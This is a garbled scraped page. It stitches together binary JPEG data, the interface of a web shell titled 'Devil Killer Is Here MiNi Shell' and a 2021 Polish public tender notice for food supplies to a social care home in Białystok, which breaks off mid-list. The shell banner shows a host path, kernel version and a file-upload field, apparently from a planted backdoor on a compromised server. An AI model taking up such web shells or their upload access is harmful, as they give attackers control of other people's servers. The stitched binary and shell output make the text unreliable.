JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211122/0027872301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świerkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dps.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2b85854-4b7f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00278723</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001105/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa artykułów żywnościowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f2b85854-4b7f-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl ePuap /dpsbialystok/SkrytkaESP oraz adres email: sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGO/341p-2/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Baleron wp. wędzony, gotowany kg 300<br/>Baleron z indyka kg 250<br/>Boczek wp. wędzony ,parzony b/k kg 180<br/>Boczek z polędwicą rolowany kg 100<br/>Filet świeży z indyka kg 100<br/>Filet świeży z kurczaka kg 1200<br/>Filet wędzony kg 20<br/>Flaki wołowe krojone mrożone kg 150<br/>Golonka konserwowa kg 150<br/>Karkówka wieprzowa surowa b/k kg 600<br/>Kaszanka pieczona kg 200<br/>Kiełbasa biała, parzona kg 320<br/>Kiełbasa krakowska formowana kg 250<br/>Kiełbasa krakowska parzona kg 280<br/>Kiełbasa krakowska sucha kg 30<br/>Kiełbasa krakowska z indyka kg 30<br/>Kiełbasa krucha kg 250<br/>Kiełbasa na „święconkę” kg 40<br/>Kiełbasa pieczona podsuszana kg 200<br/>Kiełbasa podwawelska kg 200<br/>Kiełbasa spod strzechy kg 180<br/>Kiełbasa toruńska kg 170<br/>Kiełbasa wieprzowa. szynkowa kg 280<br/>Kiełbasa z szynki wp. zawartość mięsa minimum 98% kg 240<br/>Kiełbasa żywiecka drobiowa kg 150<br/>Kiełbasa żywiecka wieprzowa kg 150<br/>Konserwa wojskowa kg 140<br/>Krupnioki kg 120<br/>Kurczak po sarmacku kg 100<br/>Kurczak z żurawiną kg 60<br/>Kurczaki świeże kg 180<br/>Łopatka prasowana kg 100<br/>Łopatka wieprzowa surowa b/k kg 2100<br/>Mortadela wieprzowa kg 190<br/>Nogi wieprzowe kg 100<br/>Ogonówka wp wędzona, parzona kg 350<br/>Parówki delikatne np. królewskie kg 450<br/>Parówkowa firmowa kg 300<br/>Pasztet jarski kg 10<br/>Pasztet wieprzowy kg 120<br/>Pasztet z całego kurczaka kg 150<br/>Pasztetowa drobiowa. kg 150<br/>Pasztetowa wp. kg 150<br/>Pieczeń drobiowa zawartość mięsa minimum 98% kg 100<br/>Pieczeń rzymska kg 100<br/>Pieczeń schabowa kg 150<br/>Polędwica drobiowa extra kg 80<br/>Polędwica drobiowa sopocka kg 100<br/>Polędwica wieprzowa sopocka kg 230<br/>Polędwica wiśniowa kg 200<br/>Polędwica wp. wędzona, parzona zawartość mięsa 75% kg 60<br/>Przysmak z indyka kg 80<br/>Rolada z kurczaka zawartość mięsa minimum 65 % kg 120<br/>Rolada z kurczakiem kg 120<br/>Salami bumerang kg 150<br/>Salceson czosnkowy kg 140<br/>Salceson wieprzowy czarny kg 100<br/>Salceson wieprzowy. kg 100<br/>Schab biały kg 130<br/>Schab kruchy kg 100<br/>Schab wieprzowy surowy b/k kg 1300<br/>Serca wieprzowe. kg 120<br/>Szynka biała formowana 71% mięsa kg 100<br/>Szynka gotowana kg 130<br/>Szynka konserwowa kg 240<br/>Szynka pieczona kg 160<br/>Szynka wieprzowa świeża kg 10<br/>Szynka wp. tyrolska kg 200<br/>Szynka wp. wędzona, parzona zawartość mięsa minimum 81% kg 50<br/>Szynka wp.wędzona,parzona zawartość mięsa 75% kg 50<br/>Szynka z piersi indyka kg 130<br/>Szynkowa luksusowa kg 200<br/>Udziec z kurczaka kg 1150<br/>Wątróbka drobiowa z indyka kg 130<br/>Wątróbka drobiowa z kurczaka kg 100<br/>Wędlina wieprzowa bezglutenowa kg 3<br/>Kiełbasa wieprzowa bezglutenowa kg 3<br/>Wędlina drobiowa bezglutenowa kg 3<br/>Żeberka wieprzowe paski kg 650 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dorsz atlantycki (Gadus morhua) filet b/sk SHP, 8-16 oz. bez glazury bez chemii. Morska produkcja. kg 200<br/>Farsz rybny z bramy, miruny (jasny) kg 60<br/>Filet śledziowy Matias luz Premium a 5 kg kg 250<br/>Filet z makreli w oleju 170g konserwa szt. 200<br/>Filet z makreli w pomidorach 170g konserwa szt. 200<br/>Filet zapiekany z serem (min 44 % ryby) kg 220<br/>Karp świeży filet kg 30<br/>Krajanka śledziowa w sosie &#34;Salsa&#34; kg 9<br/>Łosoś sałatkowy wędzony 1 kg kg 5<br/>Makrela wędzona 300-500 g kg 2<br/>Mintaj (Theragra chalcogramma) filet b/s SHP, 6-8 oz. bez glazury, bez chemii. kg 100<br/>Miruna (Macruronus novaezelandiae) filet z/s SHP, bez glazury 8-12 oz. Morska produkcja kg 400<br/>Morszczuk (Merluccius hubsi) filet b/s SHP, bez glazury, Argentyna 300-400 g. Morska produkcja kg 50<br/>Opiekane rolmopsy śledziowe w galarecie min (50% ryby) kg 100<br/>Opiekane rolmopsy śledziowe w sosie pomidorowym min (50% ryby) kg 300<br/>Pasty kanapkowe 80 g z dodatkiem ryb, grzybów Pastella Lisner szt. 1900<br/>Płat śledziowy marynowany z/sk a 4 kg kg 10<br/>Ryba faszerowana w galarecie 260 g szt. 900<br/>Sałatki śledziowe 150 g szt. 1000<br/>Tuńczyk kawałki w oleju 170 g szt. 300 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03311000-2 - Ryby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ananas mrożony kostka kg 10<br/>Brokuły op. 10kg kg 400<br/>Brukselka kg 30<br/>Brzoskwinia kostka op. 10 kg kg 50<br/>Bukiet królewski(3 składnikowy)op.2,5kg kg 430<br/>Cukinia plastry falista op. 2,5 kg kg 5<br/>Dynia mrożona kostka op.2,5 kg kg 10<br/>Fasola szparagowa mrożona żółta cięta op. 10kg kg 200<br/>Fasolka szparagowa mrożona zielona op. 10kg kg 300<br/>Groszek zielony op. 10kg kg 40<br/>Kalafior mrożony op. 10kg kg 500<br/>Kartacze z mięsem kg 150<br/>Knedle z owocami- różne kg 100<br/>Malina mrożona kg 10<br/>Marchew kostka op. 10kg kg 200<br/>Mieszanka 7 skład. op.10kg kg 250<br/>Mieszanka kompotowa 4 składnikowa op. 10kg kg 500<br/>Morele mrożone kostka kg 10<br/>Papryka trio mrożona 2,5 kg kg 10<br/>Pierogi z kapustą i grzybami np. Virtu kg 30<br/>Pierogi z mięsem np. Virtu kg 50<br/>Pierogi z owocami (truskawka, jagoda, jabłko ) kg 50<br/>Pierogi z serem np. Virtu kg 50<br/>Porzeczka czarna mrożona op. 10kg kg 1000<br/>Pyzy ziemniaczane kg 20<br/>Pyzy ziemniaczane z mięsem np. Chłodnia Białystok kg 100<br/>Szpinak mrożony brykiet kg 120<br/>Śliwka b/ pestki op. 2,5 kg kg 20<br/>Truskawki mrożona op. 10kg kg 250<br/>Warzywa na patelnię z ziemniakami kg 100<br/>Wiśnie b/pestek op. 2,5 kg kg 100<br/>Włoszczyzna 3 składnikowa paski kg 100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja kurze L-duże 63 g&lt;masa&lt;73 g) szt. 35000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Chleb baltonowski krojony 600g szt. 18000<br/>Chleb wileński krojony 400g szt. 3000<br/>Chleb żytni razowy 500g szt. 4500<br/>Chleb wieloziarnisty krojony 500g szt. 2200<br/>Chleb mieszany pytlowy trzy ziarna 500g.krojony szt. 3500<br/>Chleb mieszany z siemieniem lnianym 500 g krojony szt. 1000<br/>Bułeczki wrocławskie 50 g szt. 53000<br/>Paluch wyborny 75g szt. 30<br/>Bułeczki graham 80g szt. 6500<br/>Bułeczki żytnie 60g szt. 2200<br/>Chałka zdobna 200g szt. 900<br/>Pączki w cukrze pudrze 50g szt. 250<br/>Bułka z marmoladą/ślimak 90g szt. 450<br/>Paluszki z cynamonem 80g szt. 450<br/>Wstążka jabłkowa szt. 450<br/>Bułka z serem 80g szt. 450<br/>Bułka maślana 30g szt. 300<br/>Bułeczka wiejska/ swojska 80g szt. 400<br/>Bułeczka z żurawiną 40g szt. 450<br/>Bułeczka babuni z kruszonką 60g szt. 350<br/>Drożdżówka / Placek z kruszonką ok.320 g szt. 100<br/>Bułeczki słodkie waniliowe 50g szt. 450<br/>Bułeczki z budyniem/ lemonka 80g szt. 450<br/>Cebulak/ Bułka margerita 100 g szt. 500<br/>Bułeczka jagodzianka 80g szt. 450<br/>Bułeczka musli szt. 100<br/>Chleb bezglutenowy codzienny (jasny, ciemny) np. Balviten kg 120<br/>Ciasto przekładane porzeczkowe kg 80<br/>Makowiec kg 80<br/>Babka piaskowa kg 80<br/>Ciasto ”Królewiec” kg 80<br/>Ciasto śliwkowe kg 80<br/>Ptasie mleczko kg 80<br/>Przekładaniec (weneckie) kg 80<br/>Sernik kg 100<br/>Ciasto bankietowe kg 80<br/>Rolada z kremem i galaretką kg 80<br/>Babeczka wielkanocna szt. 188<br/>Ciasto krówka kg 80 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Drożdże piekarnicze kg 36<br/>Jogurt kremowy z owocami 122g Fantazja-różne smaki szt. 420<br/>Jogurt naturalny 150 g szt. 6 400<br/>Jogurt naturalny 350 g szt. 120<br/>Jogurt owocowy 150 g różne smaki szt. 2 700<br/>Jogurt pitny naturalny 250 g szt. 120<br/>Jogurt pitny smakowy 250 g różne smaki szt. 1200<br/>Jogurt pitny smakowy różne smaki b/ cukru 250g szt. 600<br/>Kefir 1,8%-3% tłuszczu 400 g szt. 400<br/>Margaryna zwykła 250 g 60% tłuszczu szt. 700<br/>Masło roślinne 250g szt. 10<br/>Masło śmietankowe stołowe 200 g 82% tłuszczu szt. 12 000<br/>Mleko 2% luz, opakowanie 5 l l 21 000<br/>Ser Favita 12% tł 270g szt. 10<br/>Ser Mozzarella Classic 125 g szt. 10<br/>Ser pleśniowy naturalny 125g szt. 10<br/>Ser żółty typu holenderskiego kg 120<br/>Ser żółty lekki 16% tł. W suchej masie kg 30<br/>Ser żółty rolada ustrzycka kg 150<br/>Ser żółty typu salami kg 150<br/>Ser żółty typu szwajcarskiego kg 150<br/>Serek homogenizowany 150 g - różne smaki szt. 1000<br/>Serek homogenizowany bez laktozy naturalny 150 g szt. 300<br/>Serek kanapkowy twarogowy 150 g - różne smaki szt. 1300<br/>Serek mascarpone 250 g szt. 10<br/>Serek mazowiecki topiony kremowy 100g - kiełbaska szt. 600<br/>Serek topiony 100 g różne smaki szt. 1 800<br/>Serek topiony 140 g krążki mix smaków szt. 1 200<br/>Serek topiony plastry 130 g - różne smaki szt. 600<br/>Serek twarogowy ziołowy/ naturalny 150g np.. Deliser szt. 